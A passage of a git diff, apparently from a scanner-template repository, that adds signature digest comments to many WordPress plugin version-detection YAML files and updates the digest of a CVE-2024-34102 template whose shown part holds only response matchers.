.../wordpress/plugins/nextend-facebook-connect.yaml | 1 + http/technologies/wordpress/plugins/nextgen-gallery.yaml | 1 + http/technologies/wordpress/plugins/ninja-forms.yaml | 1 + http/technologies/wordpress/plugins/ocean-extra.yaml | 1 + .../technologies/wordpress/plugins/official-facebook-pixel.yaml | 1 + http/technologies/wordpress/plugins/one-click-demo-import.yaml | 1 + http/technologies/wordpress/plugins/optinmonster.yaml | 1 + http/technologies/wordpress/plugins/otter-blocks.yaml | 1 + http/technologies/wordpress/plugins/password-protected.yaml | 1 + http/technologies/wordpress/plugins/pdf-embedder.yaml | 1 + .../wordpress/plugins/pinterest-for-woocommerce.yaml | 1 + http/technologies/wordpress/plugins/pixelyoursite.yaml | 1 + http/technologies/wordpress/plugins/polylang.yaml | 1 + http/technologies/wordpress/plugins/popup-maker.yaml | 1 + http/technologies/wordpress/plugins/post-smtp.yaml | 1 + http/technologies/wordpress/plugins/post-types-order.yaml | 1 + .../wordpress/plugins/premium-addons-for-elementor.yaml | 1 + http/technologies/wordpress/plugins/pretty-link.yaml | 1 + http/technologies/wordpress/plugins/really-simple-captcha.yaml | 1 + http/technologies/wordpress/plugins/really-simple-ssl.yaml | 1 + http/technologies/wordpress/plugins/redirection.yaml | 1 + http/technologies/wordpress/plugins/redux-framework.yaml | 1 + http/technologies/wordpress/plugins/regenerate-thumbnails.yaml | 1 + http/technologies/wordpress/plugins/royal-elementor-addons.yaml | 1 + http/technologies/wordpress/plugins/safe-svg.yaml | 1 + http/technologies/wordpress/plugins/seo-by-rank-math.yaml | 1 + http/technologies/wordpress/plugins/sg-cachepress.yaml | 1 + http/technologies/wordpress/plugins/sg-security.yaml | 1 + http/technologies/wordpress/plugins/shortcodes-ultimate.yaml | 1 + .../wordpress/plugins/shortpixel-image-optimiser.yaml | 1 + .../wordpress/plugins/simple-custom-post-order.yaml | 1 + http/technologies/wordpress/plugins/simple-history.yaml | 1 + http/technologies/wordpress/plugins/siteguard.yaml | 1 + http/technologies/wordpress/plugins/siteorigin-panels.yaml | 1 + http/technologies/wordpress/plugins/smart-slider-3.yaml | 1 + http/technologies/wordpress/plugins/so-widgets-bundle.yaml | 1 + .../wordpress/plugins/sticky-header-effects-for-elementor.yaml | 1 + .../wordpress/plugins/stops-core-theme-and-plugin-updates.yaml | 1 + http/technologies/wordpress/plugins/sucuri-scanner.yaml | 1 + http/technologies/wordpress/plugins/svg-support.yaml | 1 + http/technologies/wordpress/plugins/table-of-contents-plus.yaml | 1 + http/technologies/wordpress/plugins/tablepress.yaml | 1 + http/technologies/wordpress/plugins/taxonomy-terms-order.yaml | 1 + http/technologies/wordpress/plugins/templately.yaml | 1 + http/technologies/wordpress/plugins/the-events-calendar.yaml | 1 + http/technologies/wordpress/plugins/tinymce-advanced.yaml | 1 + .../wordpress/plugins/translatepress-multilingual.yaml | 1 + .../wordpress/plugins/ultimate-addons-for-gutenberg.yaml | 1 + .../technologies/wordpress/plugins/under-construction-page.yaml | 1 + http/technologies/wordpress/plugins/updraftplus.yaml | 1 + http/technologies/wordpress/plugins/user-role-editor.yaml | 1 + http/technologies/wordpress/plugins/w3-total-cache.yaml | 1 + .../wordpress/plugins/webp-converter-for-media.yaml | 1 + http/technologies/wordpress/plugins/webp-express.yaml | 1 + .../wordpress/plugins/widget-importer-exporter.yaml | 1 + .../wordpress/plugins/woo-cart-abandonment-recovery.yaml | 1 + .../wordpress/plugins/woo-checkout-field-editor-pro.yaml | 1 + http/technologies/wordpress/plugins/woo-variation-swatches.yaml | 1 + .../wordpress/plugins/woocommerce-gateway-stripe.yaml | 1 + .../wordpress/plugins/woocommerce-legacy-rest-api.yaml | 1 + http/technologies/wordpress/plugins/woocommerce-payments.yaml | 1 + .../wordpress/plugins/woocommerce-paypal-payments.yaml | 1 + .../plugins/woocommerce-pdf-invoices-packing-slips.yaml | 1 + http/technologies/wordpress/plugins/woocommerce-services.yaml | 1 + http/technologies/wordpress/plugins/woocommerce.yaml | 1 + http/technologies/wordpress/plugins/wordfence.yaml | 1 + http/technologies/wordpress/plugins/wordpress-importer.yaml | 1 + http/technologies/wordpress/plugins/wordpress-seo.yaml | 1 + http/technologies/wordpress/plugins/worker.yaml | 1 + http/technologies/wordpress/plugins/wp-fastest-cache.yaml | 1 + http/technologies/wordpress/plugins/wp-file-manager.yaml | 1 + http/technologies/wordpress/plugins/wp-google-maps.yaml | 1 + http/technologies/wordpress/plugins/wp-mail-smtp.yaml | 1 + http/technologies/wordpress/plugins/wp-maintenance-mode.yaml | 1 + http/technologies/wordpress/plugins/wp-migrate-db.yaml | 1 + http/technologies/wordpress/plugins/wp-multibyte-patch.yaml | 1 + http/technologies/wordpress/plugins/wp-optimize.yaml | 1 + http/technologies/wordpress/plugins/wp-pagenavi.yaml | 1 + http/technologies/wordpress/plugins/wp-reset.yaml | 1 + .../wordpress/plugins/wp-reviews-plugin-for-google.yaml | 1 + http/technologies/wordpress/plugins/wp-rollback.yaml | 1 + http/technologies/wordpress/plugins/wp-seopress.yaml | 1 + http/technologies/wordpress/plugins/wp-sitemap-page.yaml | 1 + http/technologies/wordpress/plugins/wp-smushit.yaml | 1 + http/technologies/wordpress/plugins/wp-statistics.yaml | 1 + http/technologies/wordpress/plugins/wp-super-cache.yaml | 1 + http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml | 1 + http/technologies/wordpress/plugins/wpcf7-redirect.yaml | 1 + http/technologies/wordpress/plugins/wpforms-lite.yaml | 1 + http/technologies/wordpress/plugins/wps-hide-login.yaml | 1 + http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml | 1 + .../wordpress/plugins/yith-woocommerce-wishlist.yaml | 1 + 201 files changed, 201 insertions(+), 1 deletion(-) diff --git a/http/cves/2024/CVE-2024-34102.yaml b/http/cves/2024/CVE-2024-34102.yaml index d2747dc572..01082a499a 100644 --- a/http/cves/2024/CVE-2024-34102.yaml +++ b/http/cves/2024/CVE-2024-34102.yaml @@ -37,4 +37,4 @@ http: - 'contains_any(body, "log file", "cartId", "no Route")' - 'contains(body, "message")' condition: and -# digest: 490a0046304402203893e705a9d4cf9e7d7e2496277394f23d202b239760870ea9cadae68ebd9b07022003ab468c5e1c261ffb105d2d9b90ce330b27a1f0546ac68ad46b5b8e29c866ce:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044022035eed0094dc5d29ccf8a1f92e54752fe27ed32cfb86432cf5fcfe0d49475e64702205f85521b014b47759d272853294a0865ed415e31e84c52f04f30236409676efe:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ad-inserter.yaml b/http/technologies/wordpress/plugins/ad-inserter.yaml index 3fd2256749..dcf6a2f207 100644 --- a/http/technologies/wordpress/plugins/ad-inserter.yaml +++ b/http/technologies/wordpress/plugins/ad-inserter.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022055566c4623d686a16d4f86d99792e3aa6aa8af3ccb59b3cba44f5bc1ad10d981022100e48ff56de14ed536dcabaf0a09813dd7f06e96b4e3afa099e633b3ecf32f0700:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/add-to-any.yaml b/http/technologies/wordpress/plugins/add-to-any.yaml index 6a0d344b63..7200024b1d 100644 --- a/http/technologies/wordpress/plugins/add-to-any.yaml +++ b/http/technologies/wordpress/plugins/add-to-any.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502204a9446dd9a0558178f4fec26847303b2b6911fc3b20049eda8d5aa54c0d719a702210088e9197271e8ba6a715193e272b699b82833a7ccbdd21efc9a059e2bc2bd1e84:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/admin-menu-editor.yaml b/http/technologies/wordpress/plugins/admin-menu-editor.yaml index 6fb5080bc8..cf72bca806 100644 --- a/http/technologies/wordpress/plugins/admin-menu-editor.yaml +++ b/http/technologies/wordpress/plugins/admin-menu-editor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402203db7bb6216e88b31f64e40d64d4e7c6d55240a6667c73f481baacc454796526c02200269d4e5db78cf76b847646cfe5b0e3ec5f4a780e720d20311d0a6f090efff40:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml index cddbb4bb2e..d01f514084 100644 --- a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml +++ b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022075d56f81aac1ecf7fabe4c5bbb137dfaaa5c4b286cfb749e17681dca6637d0cd02205b68f490a5de62086abaf8687fc85e5fab718d5b75adcba78561182a8f48b3ad:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/akismet.yaml b/http/technologies/wordpress/plugins/akismet.yaml index 6f253f9f55..0142a17b72 100644 --- a/http/technologies/wordpress/plugins/akismet.yaml +++ b/http/technologies/wordpress/plugins/akismet.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100d1a370d4914b5d1e8977dc24ab53e6476b924f95739794dd514534d18706af1c022051a9842d3917e906fd87b094e0c24021152f39c347cdd1a1d5b01444e078f1cf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml index fe45de4d04..14c4c8afee 100644 --- a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022029e0af2f625fc595852b23b8c3baa5e8d7ce0bec2be63d2c5e92a138ce69e480022100a6ab1c9b4aa2d2212832af0a819a2487e2443062e9a15691911b2ecd5600ebbf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml index 69e425f446..79dbf1440b 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a0048304602210085faca8c6e3fe54d54a094d61356919702a4fcbb0862f01dcaf1b41e8677a432022100d841c25cb2bfb5788f09cfd1b57b520b960b1a7dbe1ba37466754a9ab7a21992:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml index 9c07c65e4e..ab7690af8c 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502207d73d293594ef539fc9947cc56eb900c3ffcb2ba59000798f7bb96c2b04c8b88022100a75b3f79175aca9a6180faf9401f7a33c5af51f99fb34b08adae8ab9e642bc65:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/amp.yaml b/http/technologies/wordpress/plugins/amp.yaml index 92c8f5656e..57a44a17ec 100644 --- a/http/technologies/wordpress/plugins/amp.yaml +++ b/http/technologies/wordpress/plugins/amp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502207329efd3629c3d19a73a1c643a27747fb6a44ded3c5d15f4dde74b5d24842ad4022100fb36d14c29e3a13910d7ef437c4e85d139b2d29aea7347f4dfeac0347595a5d8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/antispam-bee.yaml b/http/technologies/wordpress/plugins/antispam-bee.yaml index 70975a19a1..783ee1ba01 100644 --- a/http/technologies/wordpress/plugins/antispam-bee.yaml +++ b/http/technologies/wordpress/plugins/antispam-bee.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100abb5d47df32501c9c8e1c39374db7226dd067cd090e9d2ad1e3709f9946e720d0220382abe5a00e295ee4f46a786f1956888362ebe9f14885cbd3f61c83235eac1d9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/astra-sites.yaml b/http/technologies/wordpress/plugins/astra-sites.yaml index fd7e3e99dd..9a69afe069 100644 --- a/http/technologies/wordpress/plugins/astra-sites.yaml +++ b/http/technologies/wordpress/plugins/astra-sites.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100d972a0d33a23fa2d318d6d5f73b744d3876c8652d14d7bc6080bf924bca96dc80221008f444a11e9e00f8229930fabbf01bc00ee00612a082b3fa350640a93b42c831e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/autoptimize.yaml b/http/technologies/wordpress/plugins/autoptimize.yaml index 18f2a2ae84..fc868a5328 100644 --- a/http/technologies/wordpress/plugins/autoptimize.yaml +++ b/http/technologies/wordpress/plugins/autoptimize.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022029bdf5c027942a5950140a29c91b85f8482cf068b4f1c2716f7794b3fd371f0e022004696d9bd0d37ef296d2afb2bbe3b582a5eda301715567ec3afc8a1c085a31cc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/backwpup.yaml b/http/technologies/wordpress/plugins/backwpup.yaml index d462977581..cb7bf94762 100644 --- a/http/technologies/wordpress/plugins/backwpup.yaml +++ b/http/technologies/wordpress/plugins/backwpup.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100c836836edbdc596ea5dd503208051890c4a44e3f954d7e1439730a4bd97f71cf02207f88ab1a20b7cb34da15d688c537a5d0bc4fab5df36ecf410cb26724a91dccb4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/better-search-replace.yaml b/http/technologies/wordpress/plugins/better-search-replace.yaml index df3c5f3a94..8c63dad6a7 100644 --- a/http/technologies/wordpress/plugins/better-search-replace.yaml +++ b/http/technologies/wordpress/plugins/better-search-replace.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100d3648f99fcf8055b1320056f143cb650aca612edabe88637806c8809c04103f80221009d7aae109d8d1f1a4977249ebcd7a4130419f28e6a528e77a5572f609dea322e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/better-wp-security.yaml b/http/technologies/wordpress/plugins/better-wp-security.yaml index 6a50e049dc..5b7f39809f 100644 --- a/http/technologies/wordpress/plugins/better-wp-security.yaml +++ b/http/technologies/wordpress/plugins/better-wp-security.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100b6e1e440205bbbcaa2afc194634ff6eb150034ce7d12ad1ab7e7ffb6640e31e7022100e1c7464386302d635a2d324d240c50f9bb344596a3ae34b4ad62b3849a263495:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml index e532694167..6b012098d0 100644 --- a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml +++ b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502200bc916f42e57d211cc229cb489b90d9eeb13e516f5e30e1a78023004d69401330221008bd921dbc9298bebd721e1bbca4996870c059867258c39ec3cd17033495531dc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml index 4c6e616c1d..39c11e76cb 100644 --- a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml +++ b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100e88d0869485693426907b30fefbea2eba1a6b54fd4f0cbb85dbda62576aac5a9022100826ebf407f1a0556e598958d41d995e86d4f7d189e4d164f4b4f075b3b0d4285:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/breeze.yaml b/http/technologies/wordpress/plugins/breeze.yaml index a70a58690c..2c1110e729 100644 --- a/http/technologies/wordpress/plugins/breeze.yaml +++ b/http/technologies/wordpress/plugins/breeze.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402206428633a42ba20e622d3c5b8a0d9d87e5f0fa81c0816718eb680bd9b0666f2cc0220265aa1a44aad2d7a980ea68fe2aff87b00add9eb982935cea051d51e03b73344:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/broken-link-checker.yaml b/http/technologies/wordpress/plugins/broken-link-checker.yaml index f8691caf0a..b3efd70abc 100644 --- a/http/technologies/wordpress/plugins/broken-link-checker.yaml +++ b/http/technologies/wordpress/plugins/broken-link-checker.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100e99f2909ec3264c6dd6b0185b692bf06cfdfad2b6f2dbaaede355698ba306ddd022100baf923e46dd043f8265f179d2808169d414fa32fe53d6835a07faddc93e06332:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/child-theme-configurator.yaml b/http/technologies/wordpress/plugins/child-theme-configurator.yaml index b1d8479d13..cc2dac2bd2 100644 --- a/http/technologies/wordpress/plugins/child-theme-configurator.yaml +++ b/http/technologies/wordpress/plugins/child-theme-configurator.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022018971ebb6113f98cd1e241ddf9b6a015d75cd95f068c22bb5ead36793c5303ff0220222ce6f3898e9598b4ffb7dd48114fadc001ba539a7cd5356b3a207aa4647504:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/classic-editor.yaml b/http/technologies/wordpress/plugins/classic-editor.yaml index 04e090313f..462d413dfb 100644 --- a/http/technologies/wordpress/plugins/classic-editor.yaml +++ b/http/technologies/wordpress/plugins/classic-editor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402206f7af1083bffb359e0f8669a6652f858a5491ce386105f2915b35f7ebc8936840220221146a4c5764567fc17b6729438cd0d720e4bed8b8c44d8602e835716d6258d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/classic-widgets.yaml b/http/technologies/wordpress/plugins/classic-widgets.yaml index 57e618924b..84e8c5f533 100644 --- a/http/technologies/wordpress/plugins/classic-widgets.yaml +++ b/http/technologies/wordpress/plugins/classic-widgets.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100f0331540f2bf3711631d04da2d01724efc7d369ff778bde61ef8f0d310d677fe022100ead2ab5349b1ce2e9110ecfaf04d1860bdcf25230c6be5541856a93823fc69f0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml index 571b3b20a3..4c5ec0d3d0 100644 --- a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml +++ b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100a60ff9bd9943bfc391879ed87fa9b9af5be94a609294c5e28301d7a377e43299022054d57adb5caa68af75e832ab76f053346443b442b4b175b7ade6a14d04bd9790:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cmb2.yaml b/http/technologies/wordpress/plugins/cmb2.yaml index 4d562316b4..90a55a5408 100644 --- a/http/technologies/wordpress/plugins/cmb2.yaml +++ b/http/technologies/wordpress/plugins/cmb2.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402200d07399e42a4da5cd82a11fe45af67e11acc629567a401b2d09105d57dabf67c02207f4012cfcdb2726f547ab4ef9249d28b2a2e7f1efd368e16ece43f0bb45561f2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/coblocks.yaml b/http/technologies/wordpress/plugins/coblocks.yaml index dcea952545..d09e29abbb 100644 --- a/http/technologies/wordpress/plugins/coblocks.yaml +++ b/http/technologies/wordpress/plugins/coblocks.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220654e26bd5f2282e4d2310e85a538a35b40b22ada0dfb846060883c8697096dd00220755649112e73593588585463737c4ef08a0c0115e28ae499319a8f8e98bbd173:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/code-snippets.yaml b/http/technologies/wordpress/plugins/code-snippets.yaml index 0ae2f18122..5f06ab27a3 100644 --- a/http/technologies/wordpress/plugins/code-snippets.yaml +++ b/http/technologies/wordpress/plugins/code-snippets.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100b25531e294b56c840c8202030e17c21fbe4e26490cf90e8b1b766fe171fabf6e02207e235b9a4b7a9b4965b27d3984453aaa7f1dddfc9cd6b9e63a9655aaffbb27ba:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/coming-soon.yaml b/http/technologies/wordpress/plugins/coming-soon.yaml index 12f549d536..8543ae0256 100644 --- a/http/technologies/wordpress/plugins/coming-soon.yaml +++ b/http/technologies/wordpress/plugins/coming-soon.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502207cd6aba5f660b954126cb3d56f4045dcea1f14613116d56310829d489dc33fd5022100afaffc113205787a2a6b76212a1c894bc6fec44b548fba91e67212e1612c8430:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/complianz-gdpr.yaml b/http/technologies/wordpress/plugins/complianz-gdpr.yaml index d8ea6a72f1..d3495be568 100644 --- a/http/technologies/wordpress/plugins/complianz-gdpr.yaml +++ b/http/technologies/wordpress/plugins/complianz-gdpr.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502202c1aa3a279d5ec3dfd5ab56ab21cd0f43dd8b59f1ea938dafea500e8f9171f1a022100f515f3b5ef579c38afbac7caeb70ea4b6b9d09c19863d55cfb3598c92c931ddb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml index 4afaf9dc97..5019ee23a7 100644 --- a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022012a1ef5b4c5becf58fb1005964203c0463d989dd691fe31fe18760111e527714022100b26eb9edc76bd9ab2004508628729aa8d1cc981a2b33dcfc7f90f7bbe24724ef:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-7.yaml b/http/technologies/wordpress/plugins/contact-form-7.yaml index 88fea67f93..250c40601d 100644 --- a/http/technologies/wordpress/plugins/contact-form-7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100bf100126554901b1e59b95906644dbd4ee552c722013eea66a8270c5582e1c7b022100d4fc4d85d70ee8a495e8e5cf0bb4b5188ac69fdf695f583d3a8b61d38e4a33da:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml index d205cdbf36..73b471a762 100644 --- a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100b00b06a6db3db470720d28e56daf34a53fc6c57d1b701ad6988c5b5399fc6efe022100b7c72ae4ef2a96c74c5289a6b31294fbaae7baed041ff9caaa9ae26075ed1cd3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cookie-law-info.yaml b/http/technologies/wordpress/plugins/cookie-law-info.yaml index 3fa20df7d2..223a17db71 100644 --- a/http/technologies/wordpress/plugins/cookie-law-info.yaml +++ b/http/technologies/wordpress/plugins/cookie-law-info.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100a7b4bf80cfe1199490edd26d74e487850e9e1d428a3c9e2a4a04584e752d0f9d02200492e40a1de0d3695e6ad88ebb0a3176f564a831bc2bcd2ab1495bc3ed4aa792:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cookie-notice.yaml b/http/technologies/wordpress/plugins/cookie-notice.yaml index bcd63ced86..4082dd2a82 100644 --- a/http/technologies/wordpress/plugins/cookie-notice.yaml +++ b/http/technologies/wordpress/plugins/cookie-notice.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100f0ac7a862bf807dd2fd3d0287dbffd4519a6476034b65e40348bf7ee9a986abd02207adc74550186b862d544ee6f337a8e94871ab231c640c7b2a59585d4f22bebf9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/copy-delete-posts.yaml b/http/technologies/wordpress/plugins/copy-delete-posts.yaml index bca0326f2b..89235dd0f8 100644 --- a/http/technologies/wordpress/plugins/copy-delete-posts.yaml +++ b/http/technologies/wordpress/plugins/copy-delete-posts.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502210082a78843c11ff0a919c23129fc71f921b12f3612274eb62c846b524c68b4b72a0220075e4010d26195346172eade5cb744bffffd0e4aa2cf29faa87d88b874335dba:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml index 854328f04b..85aa3626f1 100644 --- a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml +++ b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502201dd0b8d8b8e39156985dd5b4e78df2a45cbd33e4532fdf74c3149396e3f6c34f022100c14c65963a17e1cd23b423fc680d0eaaecf665c95ef00b14765b350615d898aa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml index 6d3f7f4566..fe453fb2f0 100644 --- a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml +++ b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100872b14e0020e73997ba8a1235247795c57b6343c41b5227ac4c0fcb0eeca61b8022100d03911c4b0670ad3497426281d6c7d2671b06885322052bb5c0303aed1a9d85f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-css-js.yaml b/http/technologies/wordpress/plugins/custom-css-js.yaml index a923d21a15..0a22bbf5ea 100644 --- a/http/technologies/wordpress/plugins/custom-css-js.yaml +++ b/http/technologies/wordpress/plugins/custom-css-js.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# 